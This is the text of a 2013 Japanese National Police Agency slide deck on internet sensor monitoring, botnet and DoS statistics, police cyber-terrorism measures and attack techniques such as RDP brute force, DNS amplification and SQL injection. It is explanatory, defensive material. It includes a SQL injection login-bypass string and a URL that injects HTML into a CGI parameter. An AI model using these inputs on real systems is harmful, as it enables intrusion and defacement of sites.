平 成 25 年 度 第 1 回 警 察 政 策 学 会 情 報 通 信 研 究 部 会 警 策 情 インターネット 定 点 観 測 の 結 果 と 攻 撃 の 技 術 的 手 法 平 成 25 年 5 月 7 日 警 察 庁 情 報 通 信 局 情 報 技 術 解 析 課 サイバーテロ 対 策 技 術 室 長 1
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 2
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 3
センサーによる 観 測 (1) 正 常 ではない 通 信 の 観 測 インターネット 定 点 観 測 CFC (H14~) 通 信 先 (ポート 別 ) 攻 撃 対 象 の 把 握 通 信 元 ( 国 別 ) 攻 撃 元 の 把 握 大 規 模 なサイバー 攻 撃 の 早 期 検 知 4
センサーによる 観 測 (2) サービスを 公 開 していないIPアドレスへの 到 達 パケットを 観 測 する パケット 到 達 特 定 のIPアドレス 複 数 ポートへの 接 続 要 求 ポートスキャン ホストの 脆 弱 性 調 査 パケット 到 達 パケット 到 達 特 定 ポートへの 接 続 要 求 かつIPアドレスを 横 断 ホストスキャン (IPアドレススキャン) サービスの 脆 弱 性 調 査 センサーへのパケット 到 達 により 攻 撃 の 予 備 的 行 為 を 観 測 できる 注 : 実 際 の 構 成 を 示 すものではありません 5
到 達 する 不 審 なパケットの 種 類 ICMP センサーによる 観 測 (3) Internet Control Message Protocol ネットワーク 上 の 他 のホストへ 誤 りの 通 知 や 通 信 に 関 する 情 報 の 通 知 メッセージを 送 るのに 使 われる コネクションレス 通 信 UDP User Datagram Protocol 転 送 速 度 は 高 いが 信 頼 性 が 低 い コネクションレス 通 信 TCP Transmission Control Protocol ホストA ホストB 信 頼 性 は 高 いが 転 送 速 度 が 低 い ハンドシェークを 有 するコネクション 通 信 AがBにTCP/IP 接 続 要 求 (3WAYハンドシェーク) 6
センサーへのアクセス 1 センサーへの 到 達 パケット 1 探 索 行 為 の 一 環 ポートスキャン ホストスキャン(IPアドレススキャン) 等 2 無 差 別 攻 撃 行 為 の 一 環 ワーム 脆 弱 性 調 査 侵 入 のための 調 査 特 定 サービスの 調 査 等 3 誤 接 続 その 他 IPアドレス 誤 り 等 ( 件 / 日 IPアドレス) 400 300 310.5 339.0 316.3 252.9 269.7 200 100 0 H20 H21 H22 H23 H24 ( 年 ) センサーへの 到 達 パケットの 推 移 (1センサーに1 日 当 たりに 到 達 するパケット 数 の 年 間 平 均 ) 7
到 達 ポートによる 分 析 (H24) センサーへのアクセス 2 28.0% 29.3% 全 世 界 27.9% 日 本 37.2% 1.9% 1.2% 2.3% 2.4% 2.5% 3.7% 15.9% 14.3% 3.7% 4.5% 5.8% 18.3% 445/TCP 1433/TCP 3389/TCP 8/ICMP 22/TCP 23/TCP 445/TCP 135/TCP 8/ICMP 557/UDP 3306/TCP 135/TCP 4899/TCP 3389/TCP その 他 80/TCP その 他 1.1% Confickerワーム 活 動 Microsoft SQL Serverのスキャン Microsoft リモートデスクトップのスキャン 8
センサーへのアクセス 3 シグネチャによる 分 析 IPS(Network Intrusion Prevention System)による 検 出 ( 件 / 日 IPアドレス) 20 16 15.3 14.1 12 8 9.3 65 6.5 8.5 4 0 H20 H21 H22 H23 H24 ( 年 ) Worm Scan VoIP Scan(P2P) UDP spam DNS その 他 シグネチャを 用 いた 不 正 侵 入 等 の 検 知 件 数 の 推 移 ( 平 成 20 年 ~24 年 ) 9
発 信 元 による 分 析 (H24) センサーへのアクセス 4 24.9% 1.4% 1.5% 1.9% 2.7% 34% 3.4% 3.5% 3.9% 4.6% 全 パケット 11.5% 40.8% 中 国 米 国 台 湾 日 本 ロシア 韓 国 ブラジル インド ルーマニア 26.7% 2.1% 2.4% 2.8% 4.5% 5.0% シグネチャ 26.6% 29.7% 中 国 米 国 ドイツ オランダ 韓 国 英 国 インド その 他 不 明 中 国 に 割 り 当 てられたIPアドレスからの 不 審 パケットが 多 いことが 分 かる 10
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 11
DoS 攻 撃 被 害 の 観 測 分 析 1 1 Syn flood 等 の 攻 撃 発 信 元 (IPヘッダのSource Address )の 詐 称 が 多 い 2 Connection Flood 等 の 攻 撃 コネクションが 確 立 するため 攻 撃 元 の 特 定 が 可 能 通 常 の 接 続 Socket Buffer Syn Ack Syn Ack Fin ホスト 相 互 接 接 続 続 終 状 了 態 12
DoS 攻 撃 被 害 の 観 測 分 析 1 1 Syn flood 等 の 攻 撃 発 信 元 (IPヘッダのSource Address )の 詐 称 が 多 い 2 Connection Flood 等 の 攻 撃 コネクションが 確 立 するため 攻 撃 元 の 特 定 が 可 能 Syn flood 攻 撃 Socket Buffer 送 信 元 IPアドレスを 詐 称 Syn Ack Syn 攻 撃 対 象 ホスト 限 界 を 超 え 新 たな 接 続 を 受 付 けられなくなる 13
跳 ね 返 りパケット Syn Ack DoS 攻 撃 被 害 の 観 測 分 析 2 送 信 元 IPアドレスの 詐 称 (センサーのIPアドレスに 一 致 ) Syn センサー Syn AckパケットのSource Addressで 被 害 ホストが 分 かる 900 800 700 755.6 22.1% 件 / 日 600 500 400 300 1.7% 3.0% 3.1% 8.4% 61.7% 200 100 0 22.2 35.5 12.2 30.9 H20 年 H21 年 H22 年 H23 年 H24 年 日 本 のDoS 攻 撃 被 害 の 観 測 件 数 ( 平 成 20 年 ~24 年 ) 80/TCP 3/ICMP 443/TCP 11/ICMP 22/TCP その 他 発 信 元 ポート 別 比 率 (H24) 14
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 15
ボットネットの トの 活 動 状 況 1 ボットネット 不 正 プログラムに 感 染 した 多 数 のコンピュータが 遠 隔 指 令 で 一 斉 に 攻 撃 できる 状 態 になったもの ボット 被 害 発 生 攻 撃 命 令 指 令 サーバ 攻 撃 被 害 サーバ ボット ボットネット DDoS 攻 撃 に 用 いられる フィルタリングによる 防 御 が 困 難 16
( 個 ) 600 ボットネットの トの 活 動 状 況 2 400 331 430 401 348 397 200 0 H20 H21 H22 H23 H24 ( 年 ) ボットネット 観 測 数 93.6% 6.4% IPアドレス 不 明 IPアドレス 判 明 30.5% 2.3% 3.4% 36% 3.6% 5.5% 6.8% 6.8% IPアドレスが 判 明 したボットの 国 別 比 率 (24 年 中 ) 19.1% 1% 8.4% 13.6% 米 国 日 本 クウェート ドイツ エジプト 英 国 トルコ カナダ 台 湾 その 他 17
ボットネットの トの 活 動 状 況 3 0.2% 2.2% 3.7% 1.3% 0.7% 5.4% 32.1% 84% 8.4% 65.5% 19.0% 61.6% SYN flood 攻 撃 UDP flood 攻 撃 PING flood 攻 撃 その 他 不 明 平 成 24 年 中 に 観 測 した 攻 撃 命 令 の 種 類 米 国 ドイツ フランス 英 国 トルコ オランダ その 他 不 明 攻 撃 対 象 の 国 別 比 率 (H24) (SYN flood 攻 撃 ) 18
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 19
P2Pファイル 共 有 ソフトウェア (1) サーバを 介 さないファイル 共 有 P2Pファイル 共 有 ソフトウェア 利 用 者 のコン ピュータ 相 互 でネットワークを 構 成 しファイル を 共 有 する (2) 匿 名 性 が 高 い 暗 号 化 通 信 中 継 機 能 などを 実 装 し 高 い 匿 名 性 を 実 現 している (3) 違 法 ファイルが 多 数 流 通 TVアニメ 映 画 等 の 映 像 の 頒 布 著 作 権 の 侵 害 児 童 ポルノ わいせつ 画 像 等 の 頒 布 ウイルス 付 きファイルの 頒 布 Winny Share 20
P2Pファイル 共 有 ネットワーク (1) ファイルの 公 開 ファイルを 公 開 しようとする 者 は 自 分 のパ ソコンの 公 開 フォルダ にファイルを 記 録 する 2 ファイル 情 報 が 生 成 拡 散 される (2) ファイルの 情 報 の 生 成 拡 散 どのようなファイルを 公 開 しているかを 表 す ファイル 情 報 が 生 成 され ネットワークに 拡 散 していく ファイル 情 報 A ファイル 情 報 共 有 するファイル 毎 に 作 成 音 楽 ファイル 公 開 フォルダ ファイル 公 開 者 A 1 公 開 したい 音 楽 動 画 等 のファイルを 公 開 フォルダに 置 く ファイル 名 保 有 PCに 関 する 情 報 (ファイル 本 体 は 含 まれない) 21
P2Pファイル 共 有 ネットワーク ファイル 情 報 A 2 ファイル 情 報 が 生 成 拡 散 される ファイル 情 報 A ファイル 共 有 ネットワーク B ファイル 情 報 B ファイル 情 報 A ファイル 情 報 A C ファイル 情 報 C ファイル 情 報 A 音 楽 ファイル 公 開 フォルダ ファイル 公 開 者 A 1 公 開 したい 音 楽 動 画 等 のファイルを 公 開 フォルダに 置 く 音 楽 ファイル ファイル 共 有 ソフト 利 用 者 22
P2P 観 測 システムの 概 要 P2P 観 測 システム ファイル 情 報 ファイル 情 報 利 用 者 利 用 者 ファイル 情 報 利 用 者 ファイル 情 報 利 用 者 ファイル 共 有 ネットワーク 公 開 者 情 報 取 得 音 楽 ファイル ファイル 公 開 者 ファイル 情 報 23
捜 査 への 活 用 例 1 この 違 法 ファイルを 誰 が 最 初 に 公 開 したのか? ファイル 情 報 5 被 疑 者 特 定 検 挙 都 道 府 県 警 察 4 回 答 2 照 会 P2P 観 測 システム 警 察 庁 3ファイル 情 報 の 分 析 データベース 24
P2Pファイル 共 有 ネットワークの 観 測 Winny 利 用 者 数 の 推 移 ( 平 成 24 年 中 ) 改 正 著 作 権 法 施 行 による 違 法 ダウンロード 刑 事 罰 化 10 月 1 日 Share 利 用 者 数 の 推 移 ( 平 成 24 年 中 ) 改 正 著 作 権 法 施 行 による 違 法 ダウンロード 刑 事 罰 化 10 月 1 日 25
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 26
http://www.npa.go.jp/cyberpolice/ 警察庁情報技術解析課 警察の取り組み サイバ 攻撃対策 サイバー攻撃対策 サイバーテロ対策 サイバ インテリジ ンス対策 サイバーインテリジェンス対策 警察庁に サイバー攻撃対策官 を設置 予定 13都道府県に サイバー攻撃特別捜査隊 を設置 情報通信部門の技術的対応等 緊密な連携をとる 情報通信部門の技術的対応等 緊密な連携をとる 27
サイバーテロ 対 策 1 サイバーテロ 対 策 重 要 インフラの 基 幹 システムに 対 する 電 子 的 攻 撃 重 要 インフラの 基 幹 システムにおける 重 大 な 障 害 で 電 子 的 攻 撃 による 可 能 性 が 高 いもの H21.2から10 2から10 事 業 者 に 拡 大 BANK 情 報 通 信 金 融 航 空 鉄 道 電 力 ガス 政 府 行 政 サービス 医 療 水 道 物 流 28
http://www.npa.go.jp/cyberpolice/ 警察庁情報技術解析課 サイバ テロ対策 2 サイバーテロ対策 目的と施策 事案発生の 未然防止 事案発生時の 被害拡大防止 サイバー攻撃 事件の検挙 重要インフラ事業者等との連携強化 要 ラ事業者等 連携強 事案の認知と緊急対処 事件の捜査支援 警備部門 生活安全部門との連携 サイバー攻撃特別捜査隊 サイバーテロ対策プロジェクト 29
サイバーテロ 対 策 3 重 要 インフラ 事 業 者 等 との 連 携 強 化 事 業 者 等 訪 問 の 実 施 サイバーテロ 対 策 協 議 会 等 における 情 報 意 見 交 換 共 同 訓 練 の 実 施 事 業 者 等 訪 問 の 実 施 サイバーテロ 対 策 協 議 会 共 同 訓 練 30
サイバーテロ 対 策 4 事 案 の 認 知 と 緊 急 対 処 関 係 機 関 との 連 絡 調 整 現 場 臨 場 攻 撃 手 法 の 分 析 被 害 サーバの 調 査 31
サイバーテロ 対 策 の 体 制 警 察 庁 サイバーテロ 対 策 推 進 室 ( 警 備 企 画 課 情 報 技 術 犯 罪 対 策 課 情 報 技 術 解 析 課 ) 連 携 内 閣 官 房 等 外 国 治 安 情 報 機 関 管 区 推 進 室 指 導 報 告 都 道 府 県 警 察 サイバーテロ 対 策 プロジェクト ( 警 備 生 活 安 全 情 報 通 信 の 各 部 門 ) 都 道 府 県 連 携 個 別 訪 問 協 議 会 共 同 訓 練 重 要 インフラ 事 業 者 等 32
警察庁情報技術解析課 http://www.npa.go.jp/cyberpolice/ サイバ サイバーインテリジェンス対策の体制 インテリジ ンス対策の体制 サイバーインテリジェンス対策の体制 新たな不正プログラム 不正接続先情報共有 SOC事業者等 ウイルス対策ソフト 提供事業者 未知の脆弱性 最新の手口等 OS提供事業者 警察庁 H24.8 H23 8 H23.8 不正プログラムの解析 情報共有 注意喚起 都道府県警察 サイバーフォースセンター H23.8 33
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 34
3(1) マルウェアの 傾 向 1 巧 妙 化 する 手 口 攻 撃 者 3 不 正 プログラム ダウンロード 4 情 報 窃 取 1 標 的 型 メール (ダウンローダ) ダ) 画 像 に 偽 装 2 感 染 被 害 者 不 正 な 指 令 等 伝 達 画 像 ファイル 送 受 に 偽 装 外 部 サイトに 接 続 プログラムのダウンロード 目 的 達 成 後 不 正 プログラムの 消 去 35
3(1) マルウェアの 傾 向 2 従 前 近 年 不 正 動 作 不 正 動 作 感 染 感 染 不 正 動 作 不 正 動 作 36
3(1) マルウェアの 傾 向 3 1 活 動 終 了 時 に 自 身 のファイルを 上 書 き 不 正 な 活 動 終 了 後 に 不 正 プログラムや 生 成 したファイルを 削 除 するものがある 単 なるファイル 削 除 ではなく 上 書 きするものがある 復 元 が 不 可 能 となる 2 動 作 環 境 を 検 出 すると 本 来 の 動 作 を 行 わない 解 析 用 仮 想 環 境 (Vmware 等 の 仮 想 ホスト 環 境 )を 検 出 すると 不 正 な 動 作 をす る 際 の 接 続 先 とは 異 なるホストに 接 続 をするものある 解 析 用 仮 想 環 境 を 検 出 すると 動 作 を 停 止 するものがある 3 実 行 ファイルや 設 定 情 報 をレジストリに 保 存 するもの コンピュータやアプリケーションの 設 定 を 保 存 するデーターベースであるレジスト リに 不 正 プログラム 本 体 設 定 ファイル 関 連 するファイル 等 を 保 存 するものが ある ディスク 上 に 不 正 プログラムの 検 体 がない 37
3(1) マルウェアの 傾 向 4 1 AES 暗 号 技 術 を 用 いる 従 前 は RC4( Rivest s Cipher 4 )やXOR( exclusive or )が 多 かった 難 読 化 であるが 最 近 では 政 府 推 奨 暗 号 でもあるAES(Advanced Encryption Standard)を 用 い たものがある 解 析 の 困 難 化 2 変 則 的 なBASE64を 用 いる BASE64の 変 換 に 標 準 テーブルを 用 いず 独 自 のテーブルを 用 いるもの ( 接 続 先 ホスト 名 窃 取 するデータ 等 のエンコードに 用 いる) 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 / 8 0 R h L 3 O n c J I 9 t q y 独 自 のBASE64 変 換 テーブル( 一 部 を 抜 粋 ) 標 準 テーブルと 変 換 手 法 については 次 ページ 38
BASE64 3(1) BASE64エンコードの 仕 組 み データ 6ビット 毎 に 区 切 る 12 51 48 61 19 変 換 テーブルの 適 用 M z w 9 T 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 A B C D E F G H I J K L M N O P 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 Q R S T U V W X Y Z a b c d e f 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 g h i j k l m n o p q r s t u v 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 w x y z 0 1 2 3 4 5 6 7 8 9 + / BASE64 変 換 テーブル 復 号 時 のビット 欠 落 を 防 止 するため 桁 揃 えのパディ ングに = を 用 いて 埋 める 39
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 40
3(2)リモートデスクトップへの 攻 撃 1 リモートデスクトップとは 設 定 にお 困 りですか? では 私 がログインして パソコンを 設 定 いたします 孫 の 顔 を 見 たくて インターネットを 始 めたが 設 定 とやらが 分 からん メーカ サポート リモートデスクトップ 機 能 41
3(2)リモートデスクトップへの 攻 撃 2 リモートデスクトップとは また 何 かありましたら サポートをご 利 用 ください おお 孫 の 顔 を 見 られるようになった ありがとう! メーカ サポート 42
3(2)リモートデスクトップへの 攻 撃 3 リモートデスクトップへの 攻 撃 インターネットを 使 えば いつでも 孫 の 顔 を 見 られる! 悪 意 ある リモートコントロール 攻 撃 者 リモートデスクトップ 機 能 パソコンメーカやソフトメーカの 保 守 サービスを 受 けるには 便 利 な 機 能 攻 撃 者 にとっては パソコンの 乗 っ 取 りや 悪 用 のメリット 43
3(2)リモートデスクトップへの 攻 撃 4 被 害 者 PCの デスクトップ 攻 撃 者 のPC 攻 撃 者 攻 撃 者 リモートデスクトップ 機 能 被 害 者 44
3(2)リモートデスクトップへの 攻 撃 5(Morto) 警 察 の 定 点 観 測 センサー リモート デスクトップ リモート デスクトップ 単 純 なパスワード リモート デスクトップ 単 純 なパスワード 単 純 なパスワード 1 探 索 2パスワード 試 行 リモート デスクトップ 3 感 染 Morto 単 純 なパスワード 45
3(2)リモートデスクトップへの 攻 撃 6(Morto) 46
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 47
3(3) WEBページの 改 ざんもどき1 掲 示 板 の 書 込 攻 撃 成 功! ここを 乗 っ 取 った リンクが 張 られている 実 は 改 ざん 事 案 ではなかった 48
当 該 WEBページ 3(3) WEBページの 改 ざんもどき2 テキストBOXに 入 力 された 値 を 基 に 該 当 あり 該 当 なし 該 当 する 情 報 ファイルを 表 示 入 力 された 値 を そのまま 表 示 資 料 番 号 を 入 力 して 下 さい 1 該 当 あり 資 料 1 資 料 番 号 を 入 力 して 下 さい AAAAAAAA 該 当 なし AAAAAAAA 49
掲 示 板 の 書 込 攻 撃 成 功! ここを 乗 っ 取 った 3(3) WEBページの 改 ざんもどき2 リンクの 内 容 http://www.xxxxx.ed.jp/opencgi/count/count.cgi?u=takahs&n=1&d=8&p=%3cimg%20 src=%22http://pic4.nipic.com/20090911/1807194_231659052423_2.jpg% 22%20 絵 の 横 幅 width=%22282%22%20 % % height=%22509%22%3e%3cp%20 絵 の 高 さ align=%22center%22%3e%3cfont%20size=%225%22%20color=%22red %22%3EHacked%20By:IOTN%20QQ:657690501%3C/font%3E%3Cp%20 %20 align=%22center%22%3e 入 力 内 容 をそのまま 表 示 外 部 ファイルの 旗 の 絵 等 を 表 示 50
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 51
3(4)DNS-Amp 攻 撃 (DNSの 動 作 とともに) 平 成 25 年 3 月 中 旬 から 下 旬 にかけて 非 営 利 のスパム 対 策 組 織 Spamhaus Project に 対 する 大 規 模 な DDoS 攻 撃 が 実 施 されたとの 報 道 DNS-Amp 攻 撃 DNS(Domain Name System) www.npa.go.jp などのFQDN(Fully Qualified Domain Name) (=ホストのドメイン 表 記 ) と IPアドレス の 相 互 変 換 を 行 うサービス 52
ドメインの 構 造 とDNSの 機 能 ドメインの 構 造 DNSの 機 能 による 区 分. jp com gov org 1 リゾルバ(Full-Service Resolver) クライアントからの 名 前 解 決 要 求 に 基 づき 他 のネームサーバを 反 復 して 検 索 する 名 前 解 決 をした 情 報 をキャッシュする go.jp co.jp ne.jp ac.jp npa.go.jp nrips.go.jp mpt.go.jp www.npa.go.jp ins.npa.go.jpnpa 2 コンテンツサーバ(Contents Server) 自 身 が 管 理 するゾーンに 限 定 し 回 答 する 該 当 情 報 が 無 い 時 は 情 報 なし と 回 答 3 スタブリゾルバ(Stub Resolver) フルサービスリゾルバと 交 信 し 必 要 な 情 報 の 送 受 を 行 う 端 末 で 動 作 する 検 索 プロ グラム 53
ドメインの 構 造 とDNS(リゾルバ)1 名 前 解 決 の 経 験 がない 場 合 www.npa.go.jp? 株 式 会 社 KEN 2 (ken.co.jp) 3 ルートDNS JP-DNS. jp com gov org DNS (リゾルバ) go.jp co.jp ne.jp ac.jp 1 www.npa.go.jp? npa.go.jp nrips.go.jp mpt.go.jp www.npa.go.jp ins.npa.go.jp 社 内 ネットワーク 問 合 せ 回 答 ゾーン: 管 理 の 範 囲 54
ドメインの 構 造 とDNS(リゾルバ)2 名 前 解 決 の 経 験 がない 場 合 www.npa.go.jp? 株 式 会 社 KEN 2 (ken.co.jp) 3 ルートDNS JP-DNS. jp com gov org DNS (リゾルバ) www.npa.go.jp? 4 5 JP-DNS NPA-DNS go.jp co.jp ne.jp ac.jp 1 www.npa.go.jp? npa.go.jp nrips.go.jp mpt.go.jp www.npa.go.jp ins.npa.go.jp 社 内 ネットワーク 問 合 せ 回 答 ゾーン: 管 理 の 範 囲 55
ドメインの 構 造 とDNS(リゾルバ)3 名 前 解 決 の 経 験 がない 場 合 www.npa.go.jp? 株 式 会 社 KEN 2 (ken.co.jp) 3 ルートDNS JP-DNS. jp com gov org DNS (リゾルバ) 1 www.npa.go.jp? www.npa.go.jp? 8 社 内 ネットワーク 4 5 JP-DNS NPA-DNS www.npa.go.jp? 6 7 www.npa.go.jp www.npa.go.jp NPA-DNS 問 合 せ 回 答 go.jp co.jp ne.jp ac.jp npa.go.jp nrips.go.jp mpt.go.jp www.npa.go.jp ins.npa.go.jp ゾーン: 管 理 の 範 囲 56
ドメインの 構 造 とDNS(キャッシュ) 再 度 の 名 前 解 決 では. 株 式 会 社 KEN (ken.co.jp) DNS (リゾルバ) キャッシュに www.npa.go.jp jp com gov org go.jp co.jp ne.jp ac.jp 1 www.npa.go.jp? 2 www.npa.go.jp npa.go.jp nrips.go.jp mpt.go.jp www.npa.go.jp ins.npa.go.jp 社 内 ネットワーク 問 合 せ 回 答 57
警察庁情報技術解析課 http://www.npa.go.jp/cyberpolice/ DNS DNS-Amp攻撃 1 A 攻撃 1 キャッシュ情報に 巨大TXTデータ 巨大TXTデ タ TXTレコードに ドに 巨大データを記録 DNS Openリゾルバ 攻撃用 DNS DNS Openリゾルバ キャッシュ情報に 巨大TXTデータ キャッシュ情報に 巨大TXTデータ DNS Openリゾルバ 攻撃者 攻撃者ドメインの TXTレコードを 含む名前解決要求 含む名前解決 求 攻撃準備完了 DNSのTXTレコードは SPFレコード(Sender Policy Framework)等にも用いられる UDPで512バイトまで1パケットで送信可 DNS拡張では4096バイトまで 58
DNS-Amp 攻 撃 (2) 被 害 ホストを 騙 り 攻 撃 者 ドメインの キャッシュ 被 害 ホストへ TXTレコードを 含 む 巨 大 サイズの 名 前 解 決 要 求 回 答 を 送 信 ボットネット DNS (Openリゾルバ) 攻 撃 用 DNS DNS (Openリゾルバ) キャッシュ 被 害 ホスト DNS (Openリゾルバ) キャッシュ 攻 撃 者 攻 撃 指 令 指 令 サーバ 転 送 データ 量 小 転 送 データ 量 大 小 サイズの 攻 撃 パケットから 巨 大 サイズの 攻 撃 パケットを 生 成 アンプ 59
ドメインの 構 造 とDNS(コンテンツサーバ). 1 www.npa.go.jp? 3 www.yahoo.co.jp? jp com gov org NPA-DNS go.jp co.jp ne.jp ac.jp 2 www.npa.go.jp 4 知 らない npa.go.jp nrips.go.jp mpt.go.jp www.npa.go.jp ins.npa.go.jp 問 合 せ 回 答 ゾーン: 管 理 の 範 囲 60
DNSの 設 定 ( 攻 撃 に 加 担 しないために) 警 察 庁 2 www.yahoo.co.jp? 1 www.yahoo.co.jp? NPA-DNS 3 www.yahoo.co.jp DNS 職 員 4 www.yahoo.co.jp ゾーン 内 部 には リゾルバとして ゾーン 外 にはコンテンツサーバとして 動 作 することが 望 まれる 6 知 らない 問 合 せ 回 答 5 www.yahoo.co.jp? 外 部 の 攻 撃 者 61
目 次 1 警 察 におけるインターネットの 観 測 (1) センサーへのアクセス (2) DoS 攻 撃 被 害 の 観 測 分 析 (3) ボットネットの 活 動 状 況 (4) P2Pファイル 共 有 ネットワークの 観 測 2 警 察 の 取 り 組 み 3 最 近 に 見 る 攻 撃 の 技 術 的 手 法 (1) 標 的 型 メールのマルウェアの 傾 向 (2) リモートデスクトップへの 攻 撃 (3) WEBページの 改 ざんもどき (4) DNS_Amp (5) SQLインジェクション (6) クロスサイト リクエスト フォージェリ 62
3(5)SQLインジェクション 攻 撃 データベース 顧 客 登 録 情 報 の 窃 取 や WEBページの 改 ざんに 用 いられる 63
3(5)SQLインジェクションの ンの 仕 組 み1 WEBアプリケーション プログラム SQL QUERY SELECT * FROM DB 名 WHERE WEBサーバ SQLサーバ データベース ユーザID パスワード を 入 力 してログイン 64
3(5)SQLインジェクションの ンの 仕 組 み2 SQL QUERY SELECT * FROM DB 名 WHERE WEBサーバ SQLサーバ DB 顧 客 情 報 の 表 示 WEBページの 改 ざん など 誤 動 作 を 発 生 させる 文 字 列 を 入 力 し 送 信 SQL 文 論 理 式 SQL:Structured Query Language データベース 問 い 合 わせ 言 語 65
3(5)SQLインジェクションの ンの 仕 組 み3 WEBアプリケーション プログラム 認 証 の 例 $user_id $passwd ID pass admin passwd user1 require rose lily ユーザ 登 録 DB (u_master) SELECT * FROM u_master WHERE ID = {$user_id} AND pass = '{$passwd}' ユーザ 登 録 DBから 入 力 されたユーザ IDがDBに 一 致 入 力 されたパス ワードがDBに 一 致 66
3(5)SQLインジェクションの ンの 仕 組 み4 WEBアプリケーション プログラムの 例 $user_id $passwd ID admin user1 rose pass passwd require lily ユーザ 登 録 DB (u_master) SELECT * FROM u_master WHERE ID = {$user_id} AND pass = '{$passwd}' ユーザが ユーザ 欄 に user パスワード 欄 に OR A = A と 入 力 したら SELECT * FROM u_master WHERE ID = user AND pass = OR A = A A=A ' と 解 釈 される 入 力 した 値 のはずなのに WEBアプリの プログラムコマンドとして 解 釈 されてしまう 67
